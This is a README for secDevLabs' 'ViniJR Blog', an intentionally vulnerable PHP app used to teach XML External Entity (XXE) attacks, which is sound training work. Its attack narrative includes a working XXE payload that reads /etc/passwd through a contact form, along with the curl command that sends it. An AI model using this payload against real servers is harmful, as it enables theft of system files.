Skip to content

Latest commit

 

History

History
 
 

vinijr-blog

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

ViniJR Blog

This is a simple PHP web application that contains an example of an XML External Entity (XXE) vulnerability and the main goal of this app is to describe how a malicious user could exploit it.

Index

What is XXE?

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

The main goal of this app is to discuss how XXE vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.

Setup

To start this intentionally insecure application, you will need Docker and Docker Compose. After forking secDevLabs, you must type the following commands to start:

cd secDevLabs/owasp-top10-2017-apps/a4/vinijr-blog
make install

Then simply visit localhost:10080 ! 😆

Get to know the app ⚽️

To properly understand how this application works, you can follow these simple steps:

  • Visit its homepage!
  • Try sending ViniJR a message.

Attack narrative

Now that you know the purpose of this app, what could go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜

👀

Non sanitized input field allows for an attacker to retrieve sensitive information

After reviewing the inputs from the app, it is possible to identify that the section "GET IN TOUCH" allows users to send messages to the server, as shown in the following picture:

Using Burp Suite proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this guide):

To replicate this POST using curl, create the following file payload.xml:

<?xml version="1.0" encoding="UTF-8"?>
<contact>
    <name>RAFAEL</name>
    <email>[email protected]</email>
    <subject>YOU ROCK</subject>
    <message>I LOVE WATCHING YOUR SKILLS, MAN</message>
</contact>

And run:

curl -d @payload.xml localhost:10080/contact.php ; echo

By checking the source code of the file, it is possible to see how this XML is loaded on the server side:

🔥

As no validation is being used to avoid ENTITIES being sent to the PHP file, an attacker could create the following evilxml.xml to perform a XXE:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<contact>
<name>&xxe;</name>
<email>[email protected]</email>
<subject>YOU ROCK</subject>
<message>I LOVE WATCHING YOUR SKILLS, MAN</message>
</contact>

And, as the following picture shows, it is possible to realize that the attack succeeds and sensitive information is retrieved from the server that is hosting the vulnerable app:

curl -d @evilxml.xml localhost:10080/contact.php ; echo

Secure this app

How would you mitigate this vulnerability? After your changes, an attacker should not be able to:

  • Extract data from the server through the method showed above.

PR solutions

[Spoiler alert 🚨 ] To understand how this vulnerability can be mitigated, check out these pull requests!

Contributing

We encourage you to contribute to SecDevLabs! Please check out the Contributing to SecDevLabs section for guidelines on how to proceed! 🎉